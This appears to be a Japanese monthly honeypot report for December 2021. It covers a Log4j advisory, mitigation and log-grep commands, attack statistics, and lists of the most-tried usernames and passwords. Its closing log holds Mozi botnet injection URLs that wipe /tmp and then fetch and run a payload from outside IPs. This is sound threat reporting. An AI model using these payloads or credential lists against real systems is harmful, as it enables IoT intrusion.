ハニーポット運用(月次報告:2021年12月)

今月のTopics

Apache Log4jの任意のコード実行の脆弱性（CVE-2021-44228）に関する注意喚起が公開された。

JavaベースのオープンソースのロギングライブラリのApache Log4jには、任意のコード実行の脆弱性（CVE-2021-44228）がある。
Apache Log4jが動作するサーバーにおいて、遠隔の第三者が本脆弱性を悪用する細工したデータを送信することで、任意のコードを実行する可能性がある。

Apache Log4j Security Vulnerabilities
Fixed in Log4j 2.15.0
https://logging.apache.org/log4j/2.x/security.html

※出典:Apache Log4jの任意のコード実行の脆弱性（CVE-2021-44228）に関する注意喚起　https://www.jpcert.or.jp/at/2021/at210050.html

www.ipa.go.jp www.jpcert.or.jp logging.apache.org

推奨の対策では以下が紹介されている。

・自身が管理するIT環境でlog4jを利用するシステムとソフトウェアを棚卸する。
（※時間のかかる作業なので、前もって始めた方が良い）

・インターネットに接続されたソフトウェア/デバイスに対し、セキュリティパッチをすぐに適用する。

・社内のソフトウェア/デバイスに対応するセキュリティパッチをできるだけ早く適用する。
※何らかの理由でパッチが適用できない場合は、システムをインターネットから隔離し、以下の緩和策を適用することを強く推奨する。
　Case1. バージョンが2.10 の場合
　　-　log4j2.formatMsgNoLookups を true に設定する。
　Case2. バージョンが2.0 から 2.10.0 までの場合
　　-　以下のコマンドを実行し、log4j から LDAP クラスを完全に削除する。
　　　　zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
　　-　一部のJVM バージョンでは、com.sun.jndi.rmi.object.trustURLCodebase および com.sun.jndi.cosnaming.object.trustURLCodebase を false に設定して、脆弱性を軽減させることが可能である。（一部の JVM のバージョンでは、すでにこの設定がデフォルトとなっている。）

・Linux/Unixのコマンドを使用して、Webサーバーのログに悪用の試みがあるかどうか（成功したかどうかにかかわらず）を確認する。
　 sudo egrep -i -r '\${jndi:(ldap[s]?|rmi|dns):/[^entan]+' /var/log/

・ネットワーク境界のログを確認し、IOC（indicators of compromise）のリストが存在するかどうかを確認する。

・SnortまたはSuricataベースの（あるいは互換性のある）ネットワークベースIDSを使用している場合、悪用の試みを検出するためのルールを使用する。

・脆弱性のあるシステムがある場合、スキャンは非常に強力であり、脆弱性のあるシステムが迅速に悪用されたと考えられるため、悪用の兆候がないか慎重にチェックする必要がある。

・WAF を使用している場合、log4j 固有のルールを導入する。Cloud Armor、Cloudflare WAF、Signal Sciences WAFなど、多くの商用ソリューションで利用可能である。

※出典：Zero-Day Exploit Targeting Popular Java Library Log4j
　- https://www.govcert.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/

TryHackMeでも動作確認用のMachineが提供されている。
tryhackme.com

log4jは発表当初は恒久対応が確立されておらず、非常に深刻かつゼロデイ攻撃に該当する内容であった。
ゼロデイ攻撃に対する備えについて改めて考えさせられる内容であった。
個人情報保護法の改正（2022年4月より施行）により情報漏洩に対する企業への罰則強化が発表されており、セキュリティ対策費用＜情報漏洩時の対応費用が現実味を帯びている。来年度の予算取りに当たっては各企業様においてもセキュリティ対策予算の増加を検討頂きたい内容であった。(新法では罰金額の桁が違うので)

改正個人情報保護法の一部

対象	罰金額(旧法)	罰金額(新法)
措置命令（42条2項、3項）の違反の罰則	30万円以下	1億円以下
個人情報データベース等の不正流用	50万円以下	1億円以下
報告義務（40条）違反の罰則	30万円以下	50万円以下

T-Potにて1か月運用した結果を記載する。

今月のChangelog

　更新無し。

前提条件

運用日時：2021年12月1日-2021年12月31日

運用期間：31日

結果

①各ハニーポットで検知したAttack件数

T-Potを構成する各ハニーポットへの攻撃件数の一覧を以下に記載する。

No	ハニーポット	件数	先月比
1	Heralding	961,176	86,886
2	Cowrie	595,514	▲167,494
3	Honeytrap	566,628	50,052
4	Dionaea	409,308	▲43,816
5	Rdpy	97,024	12,641
6	Adbhoney	15,306	810
7	Mailoney	14,416	▲1,139
8	Tanner	4,336	1,248
9	Ciscoasa	2,674	627
10	ConPot	1,730	481
11	CitrixHoneypot	1,577	126
12	ElasticPot	1,072	76
13	Medpot	112	▲23

Result
- 全体的なアクセス数の減少は継続中。
- Heraldingへのアクセス数は依然として多い。

②攻撃元の国名と件数(Top 20)

各ハニーポットへの攻撃元の国名の総件数を以下に記載する。

No	攻撃元の国名	件数	先月順位
1	Russia	702,356	1(→)
2	Netherlands	529,039	2(→)
3	United States	421,708	4(↑)
4	China	180,816	3(↓)
5	Ukraine	81,292	7(↑)
6	Denmark	74,584	圏外(↑)
7	India	67,107	9(↑)
8	Vietnam	65,611	8(→)
9	Japan	36,691	13(↑)
10	Hong Kong	30,701	圏外(↑)
11	Sweden	27,433	12(↑)
12	South Korea	25,406	圏外(↑)
13	Taiwan	25,279	19(↑)
14	Brazil	24,708	6(↓)
15	Latvia	23,503	15(→)
16	Indonesia	22,645	14(↓)
17	United Kingdom	17,522	5(↓)
18	Poland	16,694	圏外(↑)
19	Germany	12,739	圏外(↑)
20	Thailand	11,957	圏外(↑)

Result
- ロシア、ニュージーランドが継続して多い。平和の祭典である北京オリンピックの裏でウクライナ侵攻による紛争が始まりつつあるのは皮肉なものですね。

③検知したCVEの脆弱性と件数

Suricata(オープンIPS)にて検知した各攻撃の脆弱性の内容を以下に記載する。

No	CVE ID	Count
1	CVE-2020-11899	1,908,169
2	CVE-2019-0708 CVE-2019-0708 CVE-2019-0708	28
3	CVE-2020-11910	12

Result
- 検知されるCVEの種類も少なくなりつつある。
- Ripple20関連は相変わらず多い。

④よく攻撃されるユーザ名

ユーザ名でよく攻撃されるキーワード(Top 50)で記載する。

No	ユーザ名	件数
1	root	52,208
2	sa	27,629
3	user	4,872
4	admin	4,009
5	postgres	2,505
6	hadoop	1,708
7	mysql	1,618
8	22	1,351
9	(empty)	1,054
10	!root	686
11	2Wire	671
12	test	454
13	support	415
14	0	351
15	666666	348
16	unknown	345
17	adm	343
18	debug	340
19	blank	339
20	knockknockwhosthere	313
21	www	300
22	nproc	299
23	administrator	267
24	anonymous	255
25	Admin	248
26	user123	235
27	db	233
28	www-data	229
29	ftp	212
30	pi	199
31	wwwroot	193
32	ubuntu	177
33	web	176
34	data	169
35	oracle	150
36	guest	126
37	git	109
38	testuser	105
39	server	102
40	ansible	83
41	ubnt	72
42	minecraft	66
43	zabbix	66
44	ftpuser	54
45	butter	51
46	dev	47
47	odoo	40
48	system	33
49	username	33
50	sh	32

Result
- 特記事項なし

⑤よく攻撃されるパスワード

パスワードでよく攻撃されるキーワード(Top 50)を以下に記載する。

No	パスワード	件数
1	admin	30,709
2	(empty)	3,356
3	1	1,810
4	password	1,638
5	blank	1,015
6	123456	937
7	root	909
8	Password	900
9	12345	658
10	12345678	594
11	1234	489
12	user	476
13	0	459
14	00000000	447
15	666666	443
16	ubnt	399
17	support	395
18	master	376
19	alpine	366
20	hi3518	356
21	backup	355
22	unknown	353
23	!ishtar	349
24	synnet	340
25	123	337
26	Passw0rd	317
27	knockknockwhosthere	309
28	test	306
29	nproc	294
30	123456789	206
31	1qaz2wsx	203
32	1q2w3e4r	171
33	!QAZ2wsx	163
34	1234567	150
35	1234567890	150
36	111111	147
37	abc123	147
38	qwerty	142
39	system	136
40	admin123	134
41	123123	114
42	pass	111
43	123qwe	107
44	000000	106
45	postgres	94
46	Admin@123	91
47	x	90
48	iloveyou	88
49	root123	84
50	oracle	82

Result
- 特記事項なし

⑥今月のmasscanとZmap

masscanの観測結果は以下の通り。
Zmapの観測結果は以下の通り。
Result
- 特記事項は無し。

最後に

log4jのような深刻度の高いゼロデイ攻撃は非常に参考になる。関連企業がサプライチェーン攻撃を受けた場合に発注元企業側も管理者責任の問われる範囲が個人情報保護法の改正により広がることを考えると、今回のlog4jの対応を契機に各企業におけるセキュリティ意識の向上につながればと個人的には思った。
shファイルとexeファイル関連の問い合わせは以下の通り。

◆shファイルに関するアクセス
/axissbins.sh
/bin.sh
/bin/sh
/bins.sh
/Ciabins.sh
/Hilix.sh
/sh
/telnet.sh
/wget.sh
/Yowai.sh

◆exeファイルに関するアクセス
/exiles.exe
360vz.exe
c.exe
ytnk.exe

◆jsファイルに関するアクセス
/language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http:/112[.]248.255.248:34891/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js
/language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http:/113[.]116.34.83:56138/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js
/language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http:/115[.]48.136.152:33245/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js
/language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http:/115[.]56.171.76:51240/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js
/language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http:/115[.]63.183.145:40679/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js
/language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http:/117[.]213.13.227:45111/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js
/language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http:/192[.]168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js
/language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http:/2[.]142.129.173:33496/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js
/language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http:/203[.]170.98.130:3462/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js
/language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http:/39[.]88.85.153:37461/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js
/language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http:/61[.]52.61.43:46123/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js
/language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http:/61[.]52.73.80:52652/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js